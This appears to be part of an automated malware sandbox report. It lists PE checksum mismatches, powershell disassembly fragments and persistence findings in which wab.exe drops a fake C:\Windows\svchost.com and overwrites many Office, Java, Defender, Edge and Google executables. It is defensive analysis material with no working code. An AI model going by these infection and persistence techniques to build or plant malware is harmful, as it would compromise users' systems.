              Source: AppVDllSurrogate.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x3d892
              Source: VC_redist.x64.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0xaff0b
              Source: AppSharingHookController.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x25428
              Source: GoogleCrashHandler64.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x739bf
              Source: Integrator.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x44ae38
              Source: AppVLP.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x710ec
              Source: AppVDllSurrogate64.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x4ec22
              Source: dbcicons.exe.9.drStatic PE information: real checksum: 0x8a074 should be: 0x2bad0
              Source: AppVDllSurrogate.exe.9.drStatic PE information: section name: .didat
              Source: msoev.exe.9.drStatic PE information: section name: .didat
              Source: OcPubMgr.exe.9.drStatic PE information: section name: .didat
              Source: officeappguardwin32.exe.9.drStatic PE information: section name: .didat
              Source: AppVDllSurrogate32.exe.9.drStatic PE information: section name: .didat
              Source: OfficeScrBroker.exe.9.drStatic PE information: section name: .didat
              Source: AppVDllSurrogate64.exe.9.drStatic PE information: section name: .didat
              Source: OfficeScrSanBroker.exe.9.drStatic PE information: section name: .didat
              Source: AppVLP.exe.9.drStatic PE information: section name: .didat
              Source: Integrator.exe.9.drStatic PE information: section name: .didat
              Source: Microsoft.Mashup.Container.Loader.exe.9.drStatic PE information: section name: .didat
              Source: AppSharingHookController.exe.9.drStatic PE information: section name: .didat
              Source: Common.DBConnection.exe.9.drStatic PE information: section name: .didat
              Source: PerfBoost.exe.9.drStatic PE information: section name: .didat
              Source: SDXHelper.exe.9.drStatic PE information: section name: .didat
              Source: chrome.exe.9.drStatic PE information: section name: .didat
              Source: MpCmdRun.exe.9.drStatic PE information: section name: .didat
              Source: MpDlpCmd.exe.9.drStatic PE information: section name: .didat
              Source: mpextms.exe.9.drStatic PE information: section name: .didat
              Source: MsMpEng.exe.9.drStatic PE information: section name: .didat
              Source: NisSrv.exe.9.drStatic PE information: section name: .didat
              Source: MpCmdRun.exe0.9.drStatic PE information: section name: .didat
              Source: VC_redist.x64.exe.9.drStatic PE information: section name: .didat
              Source: UcMapi.exe.9.drStatic PE information: section name: .didat
              Source: Wordconv.exe.9.drStatic PE information: section name: .didat
              Source: ai.exe.9.drStatic PE information: section name: .didat
              Source: aimgr.exe.9.drStatic PE information: section name: .didat
              Source: integrator.exe.9.drStatic PE information: section name: .didat
              Source: ConfigSecurityPolicy.exe.9.drStatic PE information: section name: .didat
              Source: MpCopyAccelerator.exe.9.drStatic PE information: section name: .didat
              Source: Au3Check.exe.9.drStatic PE information: section name: .didat
              Source: Au3Info.exe.9.drStatic PE information: section name: .didat
              Source: Au3Info_x64.exe.9.drStatic PE information: section name: .didat
              Source: Aut2exe.exe.9.drStatic PE information: section name: .didat
              Source: Aut2exe_x64.exe.9.drStatic PE information: section name: .didat
              Source: upx.exe.9.drStatic PE information: section name: .didat
              Source: AutoIt3Help.exe.9.drStatic PE information: section name: .didat
              Source: ai.exe0.9.drStatic PE information: section name: .didat
              Source: aimgr.exe0.9.drStatic PE information: section name: .didat
              Source: AutoIt3_x64.exe.9.drStatic PE information: section name: .didat
              Source: SciTE.exe.9.drStatic PE information: section name: .didat
              Source: Uninstall.exe.9.drStatic PE information: section name: .didat
              Source: AdobeARMHelper.exe.9.drStatic PE information: section name: .didat
              Source: armsvc.exe.9.drStatic PE information: section name: .didat
              Source: jaureg.exe.9.drStatic PE information: section name: .didat
              Source: jucheck.exe.9.drStatic PE information: section name: .didat
              Source: jusched.exe.9.drStatic PE information: section name: .didat
              Source: VSTOInstaller.exe.9.drStatic PE information: section name: .didat
              Source: OLicenseHeartbeat.exe.9.drStatic PE information: section name: .didat
              Source: AppSharingHookController64.exe.9.drStatic PE information: section name: .didat
              Source: SQLDumper.exe.9.drStatic PE information: section name: .didat
              Source: accicons.exe.9.drStatic PE information: section name: .didat
              Source: dbcicons.exe.9.drStatic PE information: section name: .didat
              Source: grv_icons.exe.9.drStatic PE information: section name: .didat
              Source: joticon.exe.9.drStatic PE information: section name: .didat
              Source: lyncicon.exe.9.drStatic PE information: section name: .didat
              Source: java.exe.9.drStatic PE information: section name: .didat
              Source: javaw.exe.9.drStatic PE information: section name: .didat
              Source: javaws.exe.9.drStatic PE information: section name: .didat
              Source: GoogleCrashHandler.exe.9.drStatic PE information: section name: .didat
              Source: GoogleCrashHandler64.exe.9.drStatic PE information: section name: .didat
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F174FB push ebx; iretd 2_2_00007FF848F1756A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F1756B push ebx; iretd 2_2_00007FF848F1756A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F100BD pushad ; iretd 2_2_00007FF848F100C1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04E7A58D pushad ; ret 6_2_04E7A59B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04E7A56A pushad ; ret 6_2_04E7A56B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04E7A518 pushad ; ret 6_2_04E7A53B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04E7E3B0 push eax; retf 6_2_04E7E3B1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04E7AFD5 push ebp; ret 6_2_04E7B033
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04E7AFB5 push esi; ret 6_2_04E7AFD3
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04E7AF85 push esi; ret 6_2_04E7AF93
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04E70F88 push eax; ret 6_2_04E70F92
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04E7AF95 push ebp; ret 6_2_04E7B033
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04E7AF65 push esi; ret 6_2_04E7AF83
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04E7AF62 push esi; ret 6_2_04E7AF63
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04E70F68 push eax; ret 6_2_04E70F72
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04E70F78 push eax; ret 6_2_04E70F82
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04E70F5D push eax; ret 6_2_04E70F62
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04E76920 pushfd ; ret 6_2_04E76933
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04E7F72D push cs; ret 6_2_04E7F73B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04E7B0E5 push esp; ret 6_2_04E7B133
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04E7B0D5 push ebp; ret 6_2_04E7B0E3
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04E7B0B5 push ebp; ret 6_2_04E7B0D3
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04E7B085 push ebp; ret 6_2_04E7B093
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04E7B065 push ebp; ret 6_2_04E7B083
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04E7B062 push ebp; ret 6_2_04E7B063
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04E7B035 push esp; ret 6_2_04E7B133
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04E7B035 push esp; ret 6_2_04E7B173
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04E7B162 push esp; ret 6_2_04E7B163
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_07A50638 push eax; mov dword ptr [esp], ecx6_2_07A50AC4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_07A50AB8 push eax; mov dword ptr [esp], ecx6_2_07A50AC4

              Persistence and Installation Behavior

              barindex
              Drops PE files with a suspicious file extension
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Windows\svchost.comJump to dropped file
              Drops executable to a common third party application directory
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Infects executable files (exe, dll, sys, html)
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Users\user\AppData\Local\Temp\chrome.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to behavior
